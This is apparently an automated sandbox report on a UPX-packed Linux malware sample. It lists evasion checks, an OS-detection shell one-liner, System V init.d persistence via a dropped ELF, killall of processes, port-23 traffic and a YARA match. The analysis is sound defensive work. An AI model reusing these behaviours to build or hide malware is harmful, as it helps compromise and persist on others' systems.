Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58610
Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 58616

Malware Analysis System Evasion:

Reads CPU information from /proc indicative of miner or evasive malware
Source: /bin/grep (PID: 3191)Reads CPU info from proc file: /proc/cpuinfo
Reads CPU information from /sys indicative of miner or evasive malware
Source: /bin/free (PID: 3205)Reads CPU info from /sys: /sys/devices/system/cpu/online
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /bin/sh (PID: 2877)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3102)Queries kernel information via 'uname':
Source: /bin/wget (PID: 3104)Queries kernel information via 'uname':
Source: /bin/curl (PID: 3129)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3191)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3200)Queries kernel information via 'uname':
Source: /bin/free (PID: 3205)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3227)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3248)Queries kernel information via 'uname':
Source: /bin/uname (PID: 3248)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3261)Queries kernel information via 'uname':
Source: /bin/uname (PID: 3261)Queries kernel information via 'uname':
Source: /bin/sh (PID: 3267)Queries kernel information via 'uname':
Source: /bin/ps (PID: 3274)Queries kernel information via 'uname':

Language, Device and Operating System Detection:

Queries the installed Ubuntu/CentOS release
Source: /tmp/agJPi4fCrP (PID: 3227)Arguments: /bin/sh -> sh -c "if [ -f /usr/bin/yum ]; then cat /etc/system-release|head -n1; elif [ -f /usr/bin/apt-get ]; then lsb_release -d|awk '{$1= \"\"; print $0}'|head -n1 ; elif [ -f /usr/bin/install ]; then busybox|head -n1|awk '{print $1\" \"$2}';fi"
Source: /bin/sh (PID: 3239)Arguments: /bin/cat -> cat /etc/system-release


Runtime Messages

Command: /tmp/agJPi4fCrP
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output:
Standard Error:

Behavior Graph

Behavior graph (interactive image not reproduced; recoverable details follow).

Behavior Graph ID: 1019092, Sample: agJPi4fCrP, Start date: 13/12/2019, Architecture: LINUX, Score: 64

Network nodes: dynddns.cf; 72.33.238.154 port 23 (WISC-MADISON-AS-UniversityofWisconsinMadisonUS, United States); 99 other IPs or domains.

Process tree:
  • agJPi4fCrP
    • agJPi4fCrP (child) -> sh -> sh -> curl, wget, chmod and 7 other processes
    • agJPi4fCrP (child) -> sh -> grep
    • agJPi4fCrP (child) -> sh -> free, grep, awk
    • agJPi4fCrP (child) -> 5 other processes -> cat and 3 other processes
    • agJPi4fCrP -> sh -> sh -> killall, killall, killall

Dropped file: /etc/rc.d/init.d/start, ELF (written by the curl process).

Signatures attached in the graph: Uses known network protocols on non-standard ports; Sample is packed with UPX; Searches for CPU information (likely indicative for DDoS capability) (grep process); Terminates several processes with shell command 'killall' (killall process); Sample tries to persist itself using System V runlevels (curl process); Sets full permissions to files and/or directories (chmod process).

Yara Overview

Initial Sample

Source: agJPi4fCrP
Rule: SUSP_ELF_LNX_UPX_Compressed_File
Description: Detects a suspicious ELF binary with UPX compression
Author: Florian Roth
Strings:
  • 0x8ef2:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x8f61:$s2: $Id: UPX
  • 0x8f12:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Antivirus and Machine Learning Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Screenshots
